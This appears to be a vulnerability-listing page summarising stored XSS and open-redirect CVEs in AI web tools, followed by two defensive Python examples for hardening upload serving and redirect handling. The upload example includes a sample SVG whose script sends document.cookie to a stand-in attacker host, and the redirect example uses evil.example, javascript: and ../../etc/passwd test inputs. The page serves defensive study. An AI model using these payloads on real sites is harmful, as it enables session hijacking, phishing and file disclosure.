7762 matches found
CVE-2024-7044 Stored XSS in open-webui/open-webui
A Stored Cross-Site Scripting XSS vulnerability exists in the chat file upload functionality of open-webui/open-webui version 0.3.8. An attacker can inject malicious content into a file, which, when accessed by a victim through a URL or shared chat, executes JavaScript in the victim's browser. Th...
CVE-2024-7044
Open WebUI vulnerable to Stored XSS (CVE-2024-7044) in open-webui/open-webui v0.3.8 via chat file upload. An attacker can inject malicious content into a file that, when accessed by a victim (via URL or shared chat), executes JavaScript in the browser, enabling user data theft, session hijacking,...
CVE-2024-10908 Open Redirect in lm-sys/fastchat
An open redirect vulnerability in lm-sys/fastchat Release v0.2.36 allows a remote unauthenticated attacker to redirect users to arbitrary websites via a specially crafted URL. This can be exploited for phishing attacks, malware distribution, and credential theft...
CVE-2024-10908
The CVE-2024-10908 entry describes an open redirect vulnerability in lm-sys/fastchat release 0.2.36. The issue allows remote, unauthenticated attackers to redirect users to arbitrary URLs, enabling phishing, malware distribution, and credential theft. Affected component: lm-sys/fastchat, version ...
CVE-2024-12760
CVE-2024-12760 is associated with BentoML v1.3.9, where the /ui/gradio_api/file= endpoint’s file parameter can be manipulated to perform an open redirect to attacker-controlled URLs. The open redirect could enable phishing or user redirection to malicious sites. Remediation: update BentoML to a v...
CVE-2024-11044 Open Redirect in automatic1111/stable-diffusion-webui
An open redirect vulnerability in automatic1111/stable-diffusion-webui version 1.10.0 allows a remote unauthenticated attacker to redirect users to arbitrary websites via a specially crafted URL. This vulnerability can be exploited to conduct phishing attacks, distribute malware, and steal user...
CVE-2024-10812 Open Redirect in binary-husky/gpt_academic
An open redirect vulnerability exists in binary-husky/gpt_academic version 3.83. The vulnerability occurs when a user is redirected to a URL specified by user-controlled input in the 'file' parameter without proper validation or sanitization. This can be exploited by attackers to conduct phishing...
CVE-2024-10812
CVE-2024-10812 affects binary-husky/gpt_academic (v3.83) with an open redirect via the file parameter. The Nuclei template for this issue confirms that it arises from user-controlled input that redirects to attacker-controlled URLs, enabling phishing, malware distribution, and credenti...
CVE-2024-8029 Stored XSS in imartinez/privategpt
An XSS vulnerability was discovered in the upload files process of imartinez/privategpt v0.5.0. Attackers can upload malicious SVG files, which execute JavaScript when victims click on the file link. This can lead to user data theft, session hijacking, malware distribution, and phishing attacks...
CVE-2024-8029
CVE-2024-8029 applies to imartinez/privategpt v0.5.0 and is a Stored XSS in the file upload path. The root cause is the ability to upload SVG files that contain JavaScript, which is executed when a user clicks the link, enabling data theft, session hijacking, malware distribution, or phishing as ...
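The two privategpt entries above, like the Open WebUI one further up, share a root cause: an uploaded file that the browser will render as a document in the application's origin. The block below is an added example (not code from imartinez/privategpt or Open WebUI) showing the two controls a practitioner would put in the upload and file-serving path: recognise SVG by its leading bytes rather than by extension or client-declared MIME type, refuse SVGs that carry script-bearing constructs, and serve every upload as an attachment with `nosniff` so a clicked file link downloads instead of executing. The function names, the header set and the sample files are assumptions constructed for illustration.

```python
"""Stored XSS via uploaded SVG: content sniffing plus safe serving headers.

Added example; not code from imartinez/privategpt or Open WebUI. The function
names, header set and the sample files below are constructed for illustration.
"""
import re
from typing import Dict, Tuple

# Constructed sample uploads (not files taken from any advisory).
BENIGN_SVG = (b'<?xml version="1.0"?>'
              b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="4"/></svg>')
SCRIPT_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg">'
              b'<script>fetch("https://attacker.invalid/?c=" + document.cookie)</script></svg>')
HANDLER_SVG = b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>'
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

# An SVG is recognised by its leading bytes, never by the extension or the
# client-declared MIME type, both of which the uploader controls.
_SVG_SNIFF = re.compile(
    rb"^\s*(<\?xml[^>]*>\s*)?(<!--.*?-->\s*)*(<!DOCTYPE[^>]*>\s*)?<svg\b", re.I | re.S)
# Common script-bearing constructs. This is a denylist and therefore only a
# secondary control; the serving headers below are what remove the execution context.
_ACTIVE_CONTENT = re.compile(
    rb"<script\b|\bon[a-z]+\s*=|javascript:|<foreignObject\b|<iframe\b", re.I)


def sniff_is_svg(data: bytes) -> bool:
    return _SVG_SNIFF.search(data[:2048]) is not None


def svg_has_active_content(data: bytes) -> bool:
    return _ACTIVE_CONTENT.search(data) is not None


def safe_filename(name: str) -> str:
    """Strip path and header-breaking characters before echoing the name back."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    return re.sub(r"[^A-Za-z0-9._-]", "_", base) or "download"


def upload_policy(filename: str, data: bytes) -> Tuple[str, Dict[str, str]]:
    """Decide whether to store the upload and which headers to send when it is
    later fetched through its file link.

    Script inside an SVG runs only when the SVG is the top-level document,
    which is exactly what happens when a victim clicks a direct link to it.
    Serving every upload as an attachment with nosniff makes the browser
    download the file instead of rendering it in the application's origin.
    """
    is_svg = sniff_is_svg(data)
    if is_svg and svg_has_active_content(data):
        return "reject", {}
    headers = {
        "X-Content-Type-Options": "nosniff",
        "Content-Disposition": f'attachment; filename="{safe_filename(filename)}"',
    }
    if is_svg:
        headers["Content-Type"] = "image/svg+xml"
        # Belt and braces: even if something renders it inline, no script loads.
        headers["Content-Security-Policy"] = "default-src 'none'; style-src 'unsafe-inline'"
    else:
        headers["Content-Type"] = "application/octet-stream"
    return "accept", headers


if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SVG), ("script", SCRIPT_SVG),
                        ("handler", HANDLER_SVG), ("png", PNG_BYTES)):
        print(label, upload_policy(f"{label}.svg", blob))
```

The denylist regex will never be complete (SVG can pull in script through several element types), which is why the decision that matters is the one in `upload_policy`: an SVG that is only ever delivered as an attachment, with `nosniff` so the browser cannot second-guess the content type, has no document context in which its script could run.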
cc.chensoul.nacos:nacos-distribution (=2.5.2), cn.sparrowmini:sparrow-org-service (=0.0.1) +618 more potentially affected by CVE-2025-22228 via org.springframework.security:spring-security-crypto (>=5.8.0 <=5.8.16)
org.springframework.security:spring-security-crypto (Maven) versions =5.8.0, =3.0.0, =3.0.1 and more. Source CVEs: CVE-2025-22228. Source advisory: OSV:GHSA-MG83-C7GQ-RV5C http...
phpIPAM Cross-Site Scripting Vulnerability
phpIPAM is an open source PHP and MySQL based IP address management (IPAM) application. A stored cross-site scripting vulnerability exists in phpIPAM version 1.5.2 in the Description field of the custom field in the...
GPT Academic Input Validation Error Vulnerability
GPT Academic is an interface that provides practical interactions for large language models such as GPT/GLM. GPT Academic suffers from an open redirection vulnerability that arises from redirecting the user to a URL specified by the user-controlled file parameter without proper validation o...
FastChat Input Validation Error Vulnerability
FastChat is an open platform from LMSYS for training, deploying, and evaluating chatbots based on large language models. An input validation error vulnerability exists in FastChat version v0.2.36, which stems from an open redirection vulnerability that could lead to phishing attacks, malware...
PT-2025-12065 · Unknown · Binary-Husky/Gpt Academic
Name of the Vulnerable Software and Affected Versions: binary-husky/gpt academic version 3.83 Description: An open redirect issue exists, allowing attackers to exploit user-controlled input in the file parameter for malicious purposes, such as phishing, malware distribution, and credential theft...
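Every open redirect entry in this listing (FastChat, BentoML, stable-diffusion-webui and the three gpt_academic entries) describes the same defect: a `file` parameter whose raw value becomes the redirect target. The block below is an added example, not code from any of those projects, that places the vulnerable pattern beside a hardened check. It goes a little beyond the advisories' wording by also catching the forms a tester would try next: protocol-relative `//host`, backslash `\host`, percent-encoded slashes and `javascript:` schemes, plus path traversal out of the served directory. The function names, the `/file=` route prefix used for the safe target and the sample inputs are assumptions for illustration.

```python
"""Open redirect through a user-controlled 'file' parameter: vulnerable pattern
beside a hardened check.

Added example; not code from gpt_academic, FastChat, stable-diffusion-webui or
BentoML. The function names, the '/file=' route prefix used for the safe
target and the sample inputs are assumptions for illustration.
"""
import posixpath
from typing import Optional
from urllib.parse import unquote, urlparse


def vulnerable_redirect(file_param: str) -> str:
    """The pattern the advisories describe: the raw `file` value becomes the
    Location header, so file=https://evil.example sends the user off-site."""
    return file_param  # would be emitted verbatim as: Location: <file_param>


def safe_redirect_target(file_param: str) -> Optional[str]:
    """Return an on-site path to redirect to, or None if the value must be rejected.

    Rejected inputs:
      * anything carrying a scheme or host: https://..., //host, \\host,
        javascript:... (percent-encoded forms are decoded first, so they match too)
      * empty values and '.' or '..' on their own
      * traversal that still escapes the served directory after normalisation
    A file name containing ':' (for example "report:1.txt") is also rejected,
    because urlparse reads the part before it as a scheme; that is a deliberate
    safe default rather than a bug.
    """
    raw = unquote(file_param)
    # Browsers treat backslashes in Location like forward slashes, so fold them
    # before parsing; otherwise "/\evil.example" slips past the netloc check.
    normalized = raw.replace("\\", "/")
    parsed = urlparse(normalized)
    if parsed.scheme or parsed.netloc or normalized.startswith("//"):
        return None
    relative = normalized.lstrip("/")
    if not relative:
        return None
    # Collapse "./" and "a/../" segments, then refuse anything that still
    # points above the served directory.
    collapsed = posixpath.normpath(relative)
    if collapsed in (".", "..") or collapsed.startswith("../"):
        return None
    return "/file=" + collapsed


if __name__ == "__main__":
    for value in ("reports/2024/summary.pdf", "https://evil.example/login",
                  "//evil.example", "%2F%2Fevil.example", "/\\evil.example",
                  "javascript:alert(1)", "../../etc/passwd"):
        print(f"{value!r:32} vulnerable -> {vulnerable_redirect(value)!r:32} "
              f"safe -> {safe_redirect_target(value)!r}")
```

The decisive property of `safe_redirect_target` is that it never returns a value that can carry a host: the output is always the fixed on-site prefix followed by a normalised relative path, so a redirect built from it cannot leave the application's origin no matter what the client sends. An allowlist of this shape is preferable to a denylist of bad prefixes, which is exactly the kind of check that `\\host` and `%2F%2F` variants are designed to slip past.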